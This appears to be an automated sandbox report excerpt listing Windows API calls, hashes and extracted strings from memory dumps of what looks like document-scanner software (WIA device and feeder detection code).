                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$CriticalSection$Increment$EnterLeave$Value$Exception@8Throw
                                                                                                • String ID: (US$@fO$@fO$PVS$d:\build.agent\teamagent\_work\1\s\build\0\finenet\finenet\serverconnection.cpp$d:\build.agent\teamagent\_work\1\s\build\0\fineobjects\inc\object.h$lVS$xMS$xMS$xMS$xMS$xMS
                                                                                                • API String ID: 994531144-1246925233
                                                                                                • Opcode ID: 6d7c8efad7cd1b5301a24c8af1f1302f532ecd884ae2038b64431dc071890c08
                                                                                                • Instruction ID: 6c8ce8e8e522dc44a051ad4735da4e38db2344d15065822da3cb99d946eadd62
                                                                                                • Opcode Fuzzy Hash: 6d7c8efad7cd1b5301a24c8af1f1302f532ecd884ae2038b64431dc071890c08
                                                                                                • Instruction Fuzzy Hash: DDA18B31A00615EFDB11DFA8C845BAEBFF5BF08314F1441AEE905AB391D778AD018B99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0048AE80: EnterCriticalSection.KERNEL32(00534CA8,74E070F0), ref: 0048AEB5
                                                                                                  • Part of subcall function 0048AE80: LeaveCriticalSection.KERNEL32(00534CA8), ref: 0048AEDD
                                                                                                  • Part of subcall function 0048AE80: InterlockedIncrement.KERNEL32(00530380), ref: 0048AF48
                                                                                                  • Part of subcall function 0048AE80: InterlockedIncrement.KERNEL32(00000000), ref: 0048AF83
                                                                                                  • Part of subcall function 0048AE80: InterlockedDecrement.KERNEL32(00530380), ref: 0048AF89
                                                                                                  • Part of subcall function 0048AE80: InterlockedDecrement.KERNEL32(00000000), ref: 0048AFAD
                                                                                                  • Part of subcall function 0048AE80: InterlockedDecrement.KERNEL32(00530380), ref: 0048AFDF
                                                                                                • EnterCriticalSection.KERNEL32(00534CA8), ref: 0048B378
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 0048B388
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0048B39B
                                                                                                • LeaveCriticalSection.KERNEL32(00534CA8), ref: 0048B3C5
                                                                                                • InterlockedDecrement.KERNEL32(0041B6D9), ref: 0048B3D3
                                                                                                • EnterCriticalSection.KERNEL32(00534CA8), ref: 0048B421
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 0048B431
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0048B43E
                                                                                                • LeaveCriticalSection.KERNEL32(00534CA8), ref: 0048B465
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 0048B473
                                                                                                • EnterCriticalSection.KERNEL32(00534CA8), ref: 0048B4C1
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 0048B4D1
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0048B4DE
                                                                                                • LeaveCriticalSection.KERNEL32(00534CA8), ref: 0048B505
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 0048B513
                                                                                                • InterlockedDecrement.KERNEL32(00000017), ref: 0048B52F
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0048B54B
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0048B56A
                                                                                                  • Part of subcall function 00483EC0: EnterCriticalSection.KERNEL32(00534D78), ref: 00483F16
                                                                                                  • Part of subcall function 00483EC0: LeaveCriticalSection.KERNEL32(00534D78,@fO), ref: 00483F6D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$CriticalSection$EnterIncrementLeave
                                                                                                • String ID: xMS$xMS$xMS$xMS$xMS$xMS$xMS$xMS$xMS
                                                                                                • API String ID: 2314776706-2728001702
                                                                                                • Opcode ID: 9b5d38be5827ea1d378088a70e105f446fef281f1745e69cea06ec2245bca621
                                                                                                • Instruction ID: a61ed584a710e574e4c27263c9ec35c266a32d8554e9c8c85cf4dcba5d4fe09c
                                                                                                • Opcode Fuzzy Hash: 9b5d38be5827ea1d378088a70e105f446fef281f1745e69cea06ec2245bca621
                                                                                                • Instruction Fuzzy Hash: 2371FE30800689EFDB01EBA9CC45BAEBFB5BF59705F144459E400B3352D7B8AA05DBB6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00429A80: InterlockedDecrement.KERNEL32(?), ref: 00429B54
                                                                                                  • Part of subcall function 00429A80: InterlockedDecrement.KERNEL32(?), ref: 00429B70
                                                                                                  • Part of subcall function 00429A80: InterlockedDecrement.KERNEL32(?), ref: 00429B8C
                                                                                                  • Part of subcall function 00429A80: InterlockedDecrement.KERNEL32(?), ref: 00429BA8
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042610B
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00426190
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004261FA
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00426272
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004262D0
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00426393
                                                                                                • InterlockedDecrement.KERNEL32(00000C0E), ref: 00426406
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00426322
                                                                                                  • Part of subcall function 0047AB50: InterlockedIncrement.KERNEL32(00530370), ref: 0047ABB7
                                                                                                  • Part of subcall function 0047AB50: InterlockedDecrement.KERNEL32(00000000), ref: 0047AC70
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042647E
                                                                                                  • Part of subcall function 00468DB0: InterlockedIncrement.KERNEL32(00530380), ref: 00468DD9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment
                                                                                                • String ID: FEEDER already set -> feeder exist$FEEDER not set$WIA_DPS_DOCUMENT_HANDLING_CAPABILITIES property exist$has FEED$has FLAT$hasAdf -> Feeder exist$nothing detected -> assuming that scanner has flatbed$setting feeder...$xMS$xMS$xMS$xMS$xMS$xMS$xMS$xMS$xMS
                                                                                                • API String ID: 2574743344-3683073097
                                                                                                • Opcode ID: 68acfdaa5873368222c78bde818bba4ec1eab30950682f8d94bbc874d9f0ca89
                                                                                                • Instruction ID: fccca9b0b469c00a771450d13eda892f760480fcc5c27844ea870e58a68406d0
                                                                                                • Opcode Fuzzy Hash: 68acfdaa5873368222c78bde818bba4ec1eab30950682f8d94bbc874d9f0ca89
                                                                                                • Instruction Fuzzy Hash: 1AC19A71A01629ABCB20EF54C812BAF77A5AF00B14F51461EF9147B3C1CB78AE058BD9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004853B3
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00485333
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00485471
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0048548D
                                                                                                • InterlockedDecrement.KERNEL32(00000004), ref: 004855C1
                                                                                                  • Part of subcall function 0046C890: InterlockedDecrement.KERNEL32(?), ref: 0046CA18
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(00000000), ref: 0046CA51
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 00485515
                                                                                                • InterlockedIncrement.KERNEL32(-00000004), ref: 0048558E
                                                                                                  • Part of subcall function 00476060: GetProcessHeap.KERNEL32(00000000,000000FF,000000FF,00000000,?,00484664,00000008,00000000,?,74E070F0,00484554,004844FC,00000000,?,00000000,00000000), ref: 00476076
                                                                                                  • Part of subcall function 00476060: HeapAlloc.KERNEL32(00000000,?,004844FC,00000000,?,?), ref: 0047607D
                                                                                                  • Part of subcall function 00476060: GetProcessHeap.KERNEL32(00000000,?,?,004844FC,00000000,?,?), ref: 004760A7
                                                                                                  • Part of subcall function 00476060: HeapFree.KERNEL32(00000000,?,004844FC,00000000,?,?), ref: 004760AE
                                                                                                  • Part of subcall function 00476060: GetLastError.KERNEL32(?,004844FC,00000000,?,?), ref: 004760B8
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 004855DF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Heap$Value$CriticalIncrementProcessSection$AllocEnterErrorException@8FreeLastLeaveThrow
                                                                                                • String ID: @fO$@fO$@fO$@fO$@fO$@fO$@fO$d:\build\teamagent\_work\1\s\0\fineobjects\inc\object.h$d:\build\teamagent\_work\1\s\0\fineobjects\src\resourceinfo.cpp$d:\build\teamagent\_work\1\s\0\fineobjects\src\resourceinfo.h$dUS$lMS$xMS$xMS$xMS$xMS$xMS
                                                                                                • API String ID: 1959064896-3983063073
                                                                                                • Opcode ID: 72979ceb2eed97b53af1babd0a9b061a778d683ba733acadf7eb262bd44b2395
                                                                                                • Instruction ID: 23cf0dd8021dba3806599bb496c868b85d606df16e1cd2ac46727e4b7dad721b
                                                                                                • Opcode Fuzzy Hash: 72979ceb2eed97b53af1babd0a9b061a778d683ba733acadf7eb262bd44b2395
                                                                                                • Instruction Fuzzy Hash: 25D1C131A00A19EFDB14EF68C841BAEBBB1AF44714F15885EE945AB381D778ED01CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • VirtualQuery.KERNEL32(?,?,0000001C,NameModuleDefinedUsed,0000001A,?,00001022,74E070F0,?), ref: 0047C1FF
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0047C24B
                                                                                                • InterlockedDecrement.KERNEL32(000000FF), ref: 0047C2BF
                                                                                                • InterlockedDecrement.KERNEL32(004E4474), ref: 0047C2DB
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 0047C2F7
                                                                                                • InterlockedDecrement.KERNEL32(0047374D), ref: 0047C313
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 0047C3BA
                                                                                                • InterlockedDecrement.KERNEL32(004E4474), ref: 0047C3D6
                                                                                                • InterlockedDecrement.KERNEL32(000000FF), ref: 0047C3F2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: DecrementInterlocked$CriticalSectionValue$EnterException@8LeaveQueryThrowVirtual
                                                                                                • String ID: %s%s%s$%s%s%s%s$@fO$NameModuleDefinedUsed$ToP$d:\build\teamagent\_work\1\s\0\fineobjects\src\message.cpp$xMS$xMS$xMS$xMS$xMS$xMS$xMS$xMS
                                                                                                • API String ID: 2188532231-502605643
                                                                                                • Opcode ID: 1cc4df6991e0340be0e44cf6c2b9144a2b71f178bddeeb0a81b9d59817a50114
                                                                                                • Instruction ID: 13a0afcd6c18b267fd4b45cf4d8836a2a95eff0bd2997fe99f8a38c461ae4dc6
                                                                                                • Opcode Fuzzy Hash: 1cc4df6991e0340be0e44cf6c2b9144a2b71f178bddeeb0a81b9d59817a50114
                                                                                                • Instruction Fuzzy Hash: EEA1EF71901648EBDB00EFA5C885BEFBBB9AF15308F14805DE40577382DB796E05CBA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 0047D1A3
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 0047D1B8
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 0047D1E7
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 0047D23C
                                                                                                • InterlockedDecrement.KERNEL32(004E462E), ref: 0047D258
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 0047D41D
                                                                                                  • Part of subcall function 00413610: InterlockedIncrement.KERNEL32(004F6640), ref: 0041365C
                                                                                                  • Part of subcall function 00413610: InterlockedDecrement.KERNEL32(004F6640), ref: 004136BA
                                                                                                • InterlockedDecrement.KERNEL32(004E462E), ref: 0047D329
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0047D345
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0047D390
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0047D3AC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment
                                                                                                • String ID: @fO$TO$]$d:\build\teamagent\_work\1\s\0\fineobjects\src\inifile.cpp$xMS$xMS$xMS$xMS$xMS$xMS$xMS$xMS
                                                                                                • API String ID: 2574743344-2152138790
                                                                                                • Opcode ID: 9099058751db7b7dc11a813c8be3aa443634dc120c8342af0d89dcaf9231dc09
                                                                                                • Instruction ID: c693ce56ce7c3de730d4051bb52a3a650ca5600f0e9b6d4b73f4c335f71cbd47
                                                                                                • Opcode Fuzzy Hash: 9099058751db7b7dc11a813c8be3aa443634dc120c8342af0d89dcaf9231dc09
                                                                                                • Instruction Fuzzy Hash: D0811670D01749EBDB01EBA9C841BEFBBB5AF44304F14845EE405B3381DB78AE0587A9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 0041D0B3
                                                                                                • IsWindow.USER32(?), ref: 0041D0E6
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0041D17D
                                                                                                • TlsGetValue.KERNEL32(?,?,?), ref: 0041D197
                                                                                                • InterlockedIncrement.KERNEL32(-00000008), ref: 0041D1EA
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                • GetTickCount.KERNEL32 ref: 0041D265
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0041D2C0
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0041D2DC
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 0041D311
                                                                                                  • Part of subcall function 0046C890: InterlockedDecrement.KERNEL32(?), ref: 0046CA18
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(00000000), ref: 0046CA51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Value$CountCriticalSectionTick$EnterException@8IncrementLeaveThrowWindow
                                                                                                • String ID: ..\Shared\ScanSession.cpp$@fO$@fO$@fO$@fO$@fO$D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Object.h$ShowNativeScanDialog $ShowNativeScanDialog whole time = $xMS$xMS$xMS
                                                                                                • API String ID: 1506011444-1777640779
                                                                                                • Opcode ID: 59a165dd2c37e47e9b5e4efcde8b01248f638ae37cdacefc22e5a9dcc9ff9010
                                                                                                • Instruction ID: 3ea26beb42a15dc8a3650c87d6044a8915d869ae78fc85b26d1fe6949dc2ef93
                                                                                                • Opcode Fuzzy Hash: 59a165dd2c37e47e9b5e4efcde8b01248f638ae37cdacefc22e5a9dcc9ff9010
                                                                                                • Instruction Fuzzy Hash: E671E5B1A00204ABDB10AF68CC46BBF77B5AF44711F15815AF915AB3D1D7B9DD008B89
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00468DB0: InterlockedIncrement.KERNEL32(00530380), ref: 00468DD9
                                                                                                  • Part of subcall function 0048A3B0: FindFirstFileW.KERNEL32(?,?), ref: 0048A411
                                                                                                  • Part of subcall function 0048A3B0: InterlockedDecrement.KERNEL32(?), ref: 0048A449
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0048C1CD
                                                                                                • GetLastError.KERNEL32 ref: 0048C1EF
                                                                                                • FindClose.KERNEL32(?), ref: 0048C210
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0048C2E8
                                                                                                • FindNextFileW.KERNEL32(FFFFFFFF,?), ref: 0048C308
                                                                                                • GetLastError.KERNEL32 ref: 0048C31C
                                                                                                • GetLastError.KERNEL32 ref: 0048C34F
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0048C364
                                                                                                • GetLastError.KERNEL32 ref: 0048C38A
                                                                                                • GetLastError.KERNEL32 ref: 0048C3C0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ErrorInterlockedLast$Decrement$Find$File$CloseFirstIncrementNext
                                                                                                • String ID: *.*$xMS$xMS$xMS$xMS$xMS$xMS$xMS$xMS$xMS
                                                                                                • API String ID: 643403832-3078422930
                                                                                                • Opcode ID: 4ff2ac5fb45bcf863eaf8fa2f768a5f468dd4d40ce3117c42f15f545fd4d4610
                                                                                                • Instruction ID: 31cf9dc44d917d1c6d3e91231cc7595da51c57227782e690448f0c430403e4b5
                                                                                                • Opcode Fuzzy Hash: 4ff2ac5fb45bcf863eaf8fa2f768a5f468dd4d40ce3117c42f15f545fd4d4610
                                                                                                • Instruction Fuzzy Hash: 7861F5319002059BDB20AFA4CC847BFBBB5EF55314F144A5AE811A73D1E7789E01C7A9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 004191B1
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00419228
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00419248
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004192FA
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0041931A
                                                                                                  • Part of subcall function 00468DB0: InterlockedIncrement.KERNEL32(00530380), ref: 00468DD9
                                                                                                • InterlockedIncrement.KERNEL32(-00000002), ref: 00419363
                                                                                                • InterlockedDecrement.KERNEL32(00000002), ref: 004193BA
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004193D5
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 004193F9
                                                                                                • LeaveCriticalSection.KERNEL32(?,?,00000000,00000000,?,?), ref: 00419413
                                                                                                • EnterCriticalSection.KERNEL32(?,00000000), ref: 0041949B
                                                                                                Strings
                                                                                                • CScanEngine::TestCapabilitiesProcess() : task data wasn't set., xrefs: 004191E6
                                                                                                • xMS, xrefs: 00419236
                                                                                                • @fO, xrefs: 00419381
                                                                                                • xMS, xrefs: 00419328
                                                                                                • xMS, xrefs: 00419308
                                                                                                • D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Object.h, xrefs: 00419377
                                                                                                • not found, xrefs: 004192B6
                                                                                                • CScanEngine::TestCapabilitiesProcess() : source, xrefs: 004192A5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$CriticalSection$Increment$EnterLeave
                                                                                                • String ID: @fO$CScanEngine::TestCapabilitiesProcess() : source$CScanEngine::TestCapabilitiesProcess() : task data wasn't set.$D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Object.h$not found$xMS$xMS$xMS
                                                                                                • API String ID: 3646776565-1799256708
                                                                                                • Opcode ID: 77c05d419a09bd24681b1b3a787a9eccd921454293b70c2843fd359485293c1e
                                                                                                • Instruction ID: e57f8b33ca3f79a848ee4eff9bbd176b2b06c5277a24f33cbb21b770ea7bf432
                                                                                                • Opcode Fuzzy Hash: 77c05d419a09bd24681b1b3a787a9eccd921454293b70c2843fd359485293c1e
                                                                                                • Instruction Fuzzy Hash: DCB1E231A01249EFCB11DFA4C955BEEBBB4AF44704F14409DE801B7382DB78AE44CBA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • TlsGetValue.KERNEL32 ref: 0042353F
                                                                                                • InterlockedIncrement.KERNEL32(-00000005), ref: 0042358A
                                                                                                • InterlockedDecrement.KERNEL32(00000008), ref: 004235AF
                                                                                                • InterlockedIncrement.KERNEL32(-00000003), ref: 0042362F
                                                                                                • InterlockedDecrement.KERNEL32(00000007), ref: 00423682
                                                                                                • InterlockedDecrement.KERNEL32(00000008), ref: 0042364E
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                • InterlockedIncrement.KERNEL32(-00000002), ref: 004236E9
                                                                                                • InterlockedDecrement.KERNEL32(00000008), ref: 00423708
                                                                                                • InterlockedDecrement.KERNEL32(00000008), ref: 0042373C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$IncrementValue$CriticalSection$EnterException@8LeaveThrow
                                                                                                • String ID: @fO$@fO$@fO$@fO$@fO$D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Object.h$HfO$HfO$Wia\Wia2Device.cpp$tO
                                                                                                • API String ID: 1861843696-1183804626
                                                                                                • Opcode ID: e46cfbd608cd96bdc6ecb7ad706875b6d595c6f8d6bc0d3e7221aece59394143
                                                                                                • Instruction ID: 82ad077e92d6378f517994aa0d1680bb2a39a8f21bf27d09591c99ec839c228f
                                                                                                • Opcode Fuzzy Hash: e46cfbd608cd96bdc6ecb7ad706875b6d595c6f8d6bc0d3e7221aece59394143
                                                                                                • Instruction Fuzzy Hash: 68A18C75700205AFDB20CF19D949B2BBBF5AF84709F15C45EE5199B382D7B9EA008B88
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00476B40: InterlockedIncrement.KERNEL32(00530380), ref: 00476C24
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 0047739D
                                                                                                • InterlockedDecrement.KERNEL32(74E070F0), ref: 004773A6
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 004773C9
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 0047743B
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 0047744D
                                                                                                • InterlockedDecrement.KERNEL32(004E3BB9), ref: 00477470
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0047748C
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004774A8
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004774C4
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004774E0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
